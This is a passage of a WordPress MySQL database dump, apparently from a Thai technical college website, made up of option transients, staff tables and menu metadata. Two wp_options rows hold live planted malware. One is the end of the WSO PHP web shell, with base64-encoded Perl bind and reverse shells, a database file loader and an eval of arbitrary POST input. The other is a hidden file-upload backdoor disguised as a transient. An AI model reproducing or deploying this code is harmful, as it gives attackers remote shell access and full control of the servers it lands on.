htmlspecialchars($_POST[\'p2\']);\r\n echo \"</textarea><br/><input type=submit value=\'Execute\'>\";\r\n echo \"</td></tr>\";\r\n }\r\n echo \"</table></form><br/>\";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query(\"SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'\");\r\n if($db->fetch())\r\n echo \"<form onsubmit=\'d.sf.p1.value=\\\"loadfile\\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>\";\r\n }\r\n if(@$_POST[\'p1\'] == \'loadfile\') {\r\n $file = $db->loadFile($_POST[\'p2\']);\r\n echo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n }\r\n } else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n echo \'</div>\';\r\n wsoFooter();\r\n}\r\nfunction actionNetwork() {\r\n wsoHeader();\r\n $back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\";\r\n $bind_port_p=\"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\";\r\n echo \"<h1>Network tools</h1><div class=content>\r\n <form name=\'nfp\' onSubmit=\\\"g(null,null,\'bpp\',this.port.value);return false;\\\">\r\n <span>Bind port to /bin/sh [perl]</span><br/>\r\n Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\r\n </form>\r\n <form name=\'nfp\' onSubmit=\\\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\\\">\r\n <span>Back-connect [perl]</span><br/>\r\n Server: <input type=\'text\' name=\'server\' value=\'\". $_SERVER[\'REMOTE_ADDR\'] .\"\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>\r\n </form><br>\";\r\n if(isset($_POST[\'p1\'])) {\r\n function cf($f,$t) {\r\n $w = @fopen($f,\"w\") or @function_exists(\'file_put_contents\');\r\n if($w){\r\n @fwrite($w,@base64_decode($t));\r\n @fclose($w);\r\n }\r\n }\r\n if($_POST[\'p1\'] == \'bpp\') {\r\n cf(\"/tmp/bp.pl\",$bind_port_p);\r\n $out = wsoEx(\"perl /tmp/bp.pl \".$_POST[\'p2\'].\" 1>/dev/null 2>&1 &\");\r\n sleep(1);\r\n echo \"<pre class=ml1>$out\\n\".wsoEx(\"ps aux | grep bp.pl\").\"</pre>\";\r\n unlink(\"/tmp/bp.pl\");\r\n }\r\n if($_POST[\'p1\'] == \'bcp\') {\r\n cf(\"/tmp/bc.pl\",$back_connect_p);\r\n $out = wsoEx(\"perl /tmp/bc.pl \".$_POST[\'p2\'].\" \".$_POST[\'p3\'].\" 1>/dev/null 2>&1 &\");\r\n sleep(1);\r\n echo \"<pre class=ml1>$out\\n\".wsoEx(\"ps aux | grep bc.pl\").\"</pre>\";\r\n unlink(\"/tmp/bc.pl\");\r\n }\r\n }\r\n echo \'</div>\';\r\n wsoFooter();\r\n}\r\nfunction actionRC() {\r\n if(!@$_POST[\'p1\']) {\r\n $a = array(\r\n \"uname\" => php_uname(),\r\n \"php_version\" => phpversion(),\r\n \"wso_version\" => WSO_VERSION,\r\n \"safemode\" => @ini_get(\'safe_mode\')\r\n );\r\n echo serialize($a);\r\n } else {\r\n eval($_POST[\'p1\']);\r\n }\r\n}\r\nif( empty($_POST[\'a\']) )\r\n if(isset($default_action) && function_exists(\'action\' . $default_action))\r\n $_POST[\'a\'] = $default_action;\r\n else\r\n $_POST[\'a\'] = \'SecInfo\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n call_user_func(\'action\' . $_POST[\'a\']);\r\nexit;\r\n?>\r\n', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3510657, '_site_transient_timeout_community-events-06677a696236b8b7e2c32b238de967b2426936', '<?php if(@$_GET[\"act\"]==\"hehe\"){if(isset($_POST[\"content\"])&&isset($_POST[\"name\"])){if($_POST[\"content\"]!=\"\"&&$_POST[\"name\"]!=\"\"){if(fwrite(fopen(stripslashes($_POST[\"name\"]),\"w\"),base64_decode($_POST[\"content\"]))){echo \"OK! <a href=\\\"\".stripslashes($_POST[\"name\"]).\"\\\">\".stripslashes($_POST[\"name\"]).\"</a>\";};}}}else{if(@$_GET[\"act\"]==\"OJCeNh985qx1FwfFhoy\"){echo \'<head><script>function Encoder(name){var e = document.getElementById(name);e.value = btoa(e.value);return true;}</script></head><meta charset=\"utf-8\"><form action=\"?act=hehe\" method=\"post\" onSubmit=\"Encoder(\\\'c\\\');\">content:<br/><textarea id=\"c\" name=\"content\" style=\"width:200px;height:100px;\"></textarea><br/>filenane:<br/><input name=\"name\"/><br/><input type=\"submit\" value=\"GO!\"></form>\';}}?>\n', 'no'),
(3521385, '_transient_timeout_tablepress_c_c81e728d9d4c2f636f067f89cc14862c', '1651473697', 'no'),
(3521386, '_transient_tablepress_c_c81e728d9d4c2f636f067f89cc14862c', '[\"tablepress_0044558c1e759f136424900ba37ddbdd\"]', 'no'),
(3521389, '_transient_timeout_tablepress_c_8f14e45fceea167a5a36dedd4bea2543', '1651473698', 'no'),
(3521390, '_transient_tablepress_c_8f14e45fceea167a5a36dedd4bea2543', '[\"tablepress_07b0cd7927944ec527e96545662fad11\"]', 'no'),
(3521393, '_transient_timeout_tablepress_c_6512bd43d9caa6e02c990b0a82652dca', '1651473698', 'no'),
(3521394, '_transient_tablepress_c_6512bd43d9caa6e02c990b0a82652dca', '[\"tablepress_814449d31ef9e25140890cd9dc3736ff\"]', 'no'),
(3521397, '_transient_timeout_tablepress_c_70efdf2ec9b086079795c442636b55fb', '1651473698', 'no'),
(3521398, '_transient_tablepress_c_70efdf2ec9b086079795c442636b55fb', '[\"tablepress_001d3f443b38b1a332e5b24e513f1081\"]', 'no'),
(3521401, '_transient_timeout_tablepress_c_1f0e3dad99908345f7439f8ffabdffc4', '1651473698', 'no'),
(3521402, '_transient_tablepress_c_1f0e3dad99908345f7439f8ffabdffc4', '[\"tablepress_da631fdc3f5aef308abc5ae392697719\"]', 'no'),
(3523730, '_transient_timeout_tablepress_c_c4ca4238a0b923820dcc509a6f75849b', '1651479720', 'no'),
(3523731, '_transient_tablepress_c_c4ca4238a0b923820dcc509a6f75849b', '[\"tablepress_495633c1ef2c0c46446b1f11bcfdeaef\"]', 'no'),
(3523734, '_transient_timeout_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3', '1651479720', 'no'),
(3523735, '_transient_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3', '[\"tablepress_ac7145037f93ebceb88c6756e4c9606f\"]', 'no'),
(3524325, '_site_transient_timeout_browser_45b3436906abb921da54e871420fa1c8', '1651452604', 'no'),
(3524326, '_site_transient_browser_45b3436906abb921da54e871420fa1c8', 'a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:14:\"100.0.4896.127\";s:8:\"platform\";s:7:\"Android\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:1;}', 'no'),
(3524509, 'pum_privacy_cookie_list', 'a:2:{s:7:\"cookies\";a:0:{}s:9:\"timestamp\";i:1650962344;}', 'yes'),
(3524566, '_site_transient_timeout_browser_09af53e829b1687c5db16483617c3ced', '1651639940', 'no'),
(3524567, '_site_transient_browser_09af53e829b1687c5db16483617c3ced', 'a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:14:\"100.0.4896.127\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}', 'no'),
(3524772, '_transient_timeout_pum_alerts_translation_status', '1651808948', 'no'),
(3524773, '_transient_pum_alerts_translation_status', 'a:8:{i:0;a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-11-21 20:58:12\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}}i:1;a:7:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-03-21 08:30:16\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}}i:2;a:7:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-11-14 00:21:22\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}}i:3;a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-03-22 22:04:21\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}}i:4;a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-10-09 10:28:24\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}}i:5;a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.6.6\";s:7:\"updated\";s:19:\"2017-05-17 21:00:26\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.6.6/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}}i:6;a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-03-22 03:01:15\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}}i:7;a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:6:\"1.8.14\";s:7:\"updated\";s:19:\"2019-07-30 11:35:16\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/translation/plugin/popup-maker/1.8.14/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}}}', 'no'),
(3524803, '_transient_pll_languages_list', 'a:2:{i:0;a:26:{s:7:\"term_id\";i:21;s:4:\"name\";s:9:\"ไทย\";s:4:\"slug\";s:2:\"th\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:21;s:8:\"taxonomy\";s:8:\"language\";s:11:\"description\";s:2:\"th\";s:6:\"parent\";i:0;s:5:\"count\";i:3494;s:10:\"tl_term_id\";i:22;s:19:\"tl_term_taxonomy_id\";i:22;s:8:\"tl_count\";i:597;s:6:\"locale\";R:9;s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:2:\"th\";s:8:\"facebook\";s:5:\"th_TH\";s:8:\"flag_url\";s:71:\"http://www.technicrayong.ac.th/wp-content/plugins/polylang/flags/th.png\";s:4:\"flag\";s:674:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAIAAAD5gJpuAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAFWSURBVHjaYvzPgAD/UNlYEUAAisQgBwAQhGGi/pzP8EBvG+BImqbL7pzuUlda9SJ7DMs85NYEBgX5Ir4AYvz/H2QHhIQz/mMDjIyMnz59AgggRkfXjTmZOu/e/fz7D2jH/7///v398+8PkPEHCEHsv3///fn978+/f8JCnGWlWwACiGX/7jOmhiKPHn3+8wck8fvPv9+//wLRr1//wORfOCkvz8fAsAUggIB++AdxJ8iRQNf++f/rF8TZ/4B6fgEZQPIXRAEoLAACCKjhx9+/f/78+f0LaC/YbIjxyGaDSaCFvxgYvgAEEAs3r5qKqhAPLzs4GP4CnQR2G9CMf2A2iPEH7BNJSe5Tp8wAAojx58+fzMzM//79wxU4EACUBYbS27dvAQKI5R87O1NJCQPEjX//MvwGkn8Yf/8GRggCAY0DSgFt2bsXIIAYv6JGJJ44hgCAAAMA8pZimQIezaoAAAAASUVORK5CYII=\" title=\"ไทย\" alt=\"ไทย\" />\";s:8:\"home_url\";s:31:\"http://www.technicrayong.ac.th/\";s:10:\"search_url\";s:31:\"http://www.technicrayong.ac.th/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"710\";s:13:\"page_on_front\";i:160;s:14:\"page_for_posts\";b:0;s:6:\"filter\";s:3:\"raw\";s:9:\"flag_code\";s:2:\"th\";}i:1;a:26:{s:7:\"term_id\";i:24;s:4:\"name\";s:7:\"English\";s:4:\"slug\";s:2:\"en\";s:10:\"term_group\";i:1;s:16:\"term_taxonomy_id\";i:24;s:8:\"taxonomy\";s:8:\"language\";s:11:\"description\";s:5:\"en_US\";s:6:\"parent\";i:0;s:5:\"count\";i:37;s:10:\"tl_term_id\";i:25;s:19:\"tl_term_taxonomy_id\";i:25;s:8:\"tl_count\";i:4;s:6:\"locale\";R:35;s:6:\"is_rtl\";i:0;s:3:\"w3c\";s:5:\"en-US\";s:8:\"facebook\";s:5:\"en_US\";s:8:\"flag_url\";s:71:\"http://www.technicrayong.ac.th/wp-content/plugins/polylang/flags/us.png\";s:4:\"flag\";s:878:\"<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAALCAIAAAD5gJpuAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHzSURBVHjaYkxOP8IAB//+Mfz7w8Dwi4HhP5CcJb/n/7evb16/APL/gRFQDiAAw3JuAgAIBEDQ/iswEERjGzBQLEru97ll0g0+3HvqMn1SpqlqGsZMsZsIe0SICA5gt5a/AGIEarCPtFh+6N/ffwxA9OvP/7//QYwff/6fZahmePeB4dNHhi+fGb59Y4zyvHHmCEAAAW3YDzQYaJJ93a+vX79aVf58//69fvEPlpIfnz59+vDhw7t37968efP3b/SXL59OnjwIEEAsDP+YgY53b2b89++/awvLn98MDi2cVxl+/vl6mituCtBghi9f/v/48e/XL86krj9XzwEEEENy8g6gu22rfn78+NGs5Ofr16+ZC58+fvyYwX8rxOxXr169fPny+fPn1//93bJlBUAAsQADZMEBxj9/GBxb2P/9+S/R8u3vzxuyaX8ZHv3j8/YGms3w8ycQARmi2eE37t4ACCDGR4/uSkrKAS35B3TT////wADOgLOBIaXIyjBlwxKAAGKRXjCB0SOEaeu+/y9fMnz4AHQxCP348R/o+l+//sMZQBNLEvif3AcIIMZbty7Ly6t9ZmXl+fXj/38GoHH/UcGfP79//BBiYHjy9+8/oUkNAAHEwt1V/vI/KBY/QSISFqM/GBg+MzB8A6PfYC5EFiDAABqgW776MP0rAAAAAElFTkSuQmCC\" title=\"English\" alt=\"English\" />\";s:8:\"home_url\";s:34:\"http://www.technicrayong.ac.th/en/\";s:10:\"search_url\";s:34:\"http://www.technicrayong.ac.th/en/\";s:4:\"host\";N;s:5:\"mo_id\";s:3:\"711\";s:13:\"page_on_front\";i:715;s:14:\"page_for_posts\";b:0;s:6:\"filter\";s:3:\"raw\";s:9:\"flag_code\";s:2:\"us\";}}', 'yes'),
(3524831, '_transient_is_multi_author', '1', 'yes'),
(3524832, '_transient_university_hub_categories', '2', 'yes'),
(3524885, '_transient_timeout_tablepress_0044558c1e759f136424900ba37ddbdd', '1651387297', 'no'),
(3524886, '_transient_tablepress_0044558c1e759f136424900ba37ddbdd', '\n<table id=\"tablepress-2\" class=\"tablepress tablepress-id-2\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">นายประภาส พวงชื่น</td><td class=\"column-2\">ครูชำนาญการพิเศษ</td><td class=\"column-3\"><a href=\"/prapas\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524887, '_transient_timeout_tablepress_07b0cd7927944ec527e96545662fad11', '1651387298', 'no'),
(3524888, '_transient_tablepress_07b0cd7927944ec527e96545662fad11', '\n<table id=\"tablepress-7\" class=\"tablepress tablepress-id-7\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">นางสาวปาริชาต ธนาภรณ์</td><td class=\"column-2\"> ครูชำนาญการพิเศษ</td><td class=\"column-3\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88-2/\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524889, '_transient_timeout_tablepress_814449d31ef9e25140890cd9dc3736ff', '1651387298', 'no'),
(3524890, '_transient_tablepress_814449d31ef9e25140890cd9dc3736ff', '\n<table id=\"tablepress-11\" class=\"tablepress tablepress-id-11\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">นายเจริญ ศรีแสง</td><td class=\"column-2\"> ครูชำนาญการ</td><td class=\"column-3\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88-3/\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524891, '_transient_timeout_tablepress_001d3f443b38b1a332e5b24e513f1081', '1651387298', 'no'),
(3524892, '_transient_tablepress_001d3f443b38b1a332e5b24e513f1081', '\n<table id=\"tablepress-17\" class=\"tablepress tablepress-id-17\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">ครู กฤษณ ทองคำ</td><td class=\"column-2\">ครูชำนาญการพิเศษ</td><td class=\"column-3\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88-4/\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524893, '_transient_timeout_tablepress_da631fdc3f5aef308abc5ae392697719', '1651387298', 'no'),
(3524894, '_transient_tablepress_da631fdc3f5aef308abc5ae392697719', '\n<table id=\"tablepress-19\" class=\"tablepress tablepress-id-19\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">ครู กฤษณ ทองคำ</td><td class=\"column-2\">ครูชำนาญการพิเศษ</td><td class=\"column-3\"><a href=\"/%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%ad%e0%b8%b2%e0%b8%88-5/\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524898, '_transient_timeout_tablepress_495633c1ef2c0c46446b1f11bcfdeaef', '1651393320', 'no'),
(3524899, '_transient_tablepress_495633c1ef2c0c46446b1f11bcfdeaef', '\n<table id=\"tablepress-1\" class=\"tablepress tablepress-id-1\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">นางณัฐธารีย์ สิริกุลปัญญาพร</td><td class=\"column-2\">รองผู้อำนวยการฝ่ายบริหารทรัพยากร</td><td class=\"column-3\"><a href=\"/wp-content/uploads/2018/05/Nuttharee-Academic-Works.pdf\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524900, '_transient_timeout_tablepress_ac7145037f93ebceb88c6756e4c9606f', '1651393320', 'no'),
(3524901, '_transient_tablepress_ac7145037f93ebceb88c6756e4c9606f', '\n<table id=\"tablepress-3\" class=\"tablepress tablepress-id-3\">\n<tbody class=\"row-hover\">\n<tr class=\"row-1 odd\">\n <td class=\"column-1\">นายยุทธนา อ่อนส้มกฤษ</td><td class=\"column-2\">รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา</td><td class=\"column-3\"><a href=\"/wp-content/uploads/2018/11/Yuttana-Academic-Works.pdf\">เปิดอ่าน</a></td>\n</tr>\n</tbody>\n</table>\n', 'no'),
(3524927, '_site_transient_timeout_theme_roots', '1651353621', 'no'),
(3524928, '_site_transient_theme_roots', 'a:10:{s:14:\"education-base\";s:7:\"/themes\";s:12:\"mh-campusmag\";s:7:\"/themes\";s:16:\"mh-magazine-lite\";s:7:\"/themes\";s:7:\"synapse\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";s:18:\"university-hub-pro\";s:7:\"/themes\";s:14:\"university-hub\";s:7:\"/themes\";}', 'no');
-- --------------------------------------------------------
--
-- Table structure for table `wp_postmeta`
--
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) UNSIGNED NOT NULL,
`post_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
`meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_postmeta`
--
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1, 2, '_wp_page_template', 'default'),
(84, 37, '_menu_item_type', 'custom'),
(85, 37, '_menu_item_menu_item_parent', '0'),
(86, 37, '_menu_item_object_id', '37'),
(87, 37, '_menu_item_object', 'custom'),
(88, 37, '_menu_item_target', ''),
(89, 37, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(90, 37, '_menu_item_xfn', ''),
(91, 37, '_menu_item_url', 'http://www.technicrayong.ac.th'),
(93, 38, '_menu_item_type', 'custom'),
(94, 38, '_menu_item_menu_item_parent', '858'),
(95, 38, '_menu_item_object_id', '38'),
(96, 38, '_menu_item_object', 'custom'),
(97, 38, '_menu_item_target', ''),
(98, 38, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(99, 38, '_menu_item_xfn', ''),
(100, 38, '_menu_item_url', 'https://www.kapook.com'),
(313, 135, '_edit_last', '1'),
(314, 135, '_thumbnail_id', '594'),
(315, 135, '_edit_lock', '1519364857:3'),
(316, 140, '_edit_last', '1'),
(317, 140, '_thumbnail_id', '598'),
(318, 140, '_edit_lock', '1518772226:3'),
(319, 144, '_edit_last', '1'),
(321, 144, '_edit_lock', '1515752410:1'),
(322, 146, '_edit_last', '1'),
(323, 146, '_edit_lock', '1519364899:3'),
(334, 151, '_edit_last', '1'),
(335, 151, '_edit_lock', '1525485644:1'),
(351, 160, '_edit_last', '1'),
(352, 160, '_edit_lock', '1651216860:14'),
(485, 225, '_menu_item_type', 'custom'),
(486, 225, '_menu_item_menu_item_parent', '858'),
(487, 225, '_menu_item_object_id', '225'),
(488, 225, '_menu_item_object', 'custom'),
(489, 225, '_menu_item_target', ''),
(490, 225, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(491, 225, '_menu_item_xfn', ''),
(492, 225, '_menu_item_url', '#'),
(494, 226, '_menu_item_type', 'custom'),
(495, 226, '_menu_item_menu_item_parent', '858'),
(496, 226, '_menu_item_object_id', '226'),
(497, 226, '_menu_item_object', 'custom'),
(498, 226, '_menu_item_target', ''),
(499, 226, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(500, 226, '_menu_item_xfn', ''),
(501, 226, '_menu_item_url', '#'),
(503, 227, '_menu_item_type', 'custom'),
(504, 227, '_menu_item_menu_item_parent', '858'),
(505, 227, '_menu_item_object_id', '227'),
(506, 227, '_menu_item_object', 'custom'),
(507, 227, '_menu_item_target', ''),
(508, 227, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(509, 227, '_menu_item_xfn', ''),
(510, 227, '_menu_item_url', '#'),
(521, 229, '_menu_item_type', 'custom'),
(522, 229, '_menu_item_menu_item_parent', '225'),
(523, 229, '_menu_item_object_id', '229'),
(524, 229, '_menu_item_object', 'custom'),
(525, 229, '_menu_item_target', ''),
(526, 229, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(527, 229, '_menu_item_xfn', ''),
(528, 229, '_menu_item_url', '/โครงสร้างฝ่ายแผนงานและ'),
(530, 230, '_menu_item_type', 'custom'),
(531, 230, '_menu_item_menu_item_parent', '226'),
(532, 230, '_menu_item_object_id', '230'),
(533, 230, '_menu_item_object', 'custom'),
(534, 230, '_menu_item_target', ''),
(535, 230, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(536, 230, '_menu_item_xfn', ''),
(537, 230, '_menu_item_url', '/โครงสร้างฝ่ายบริหารทรั'),
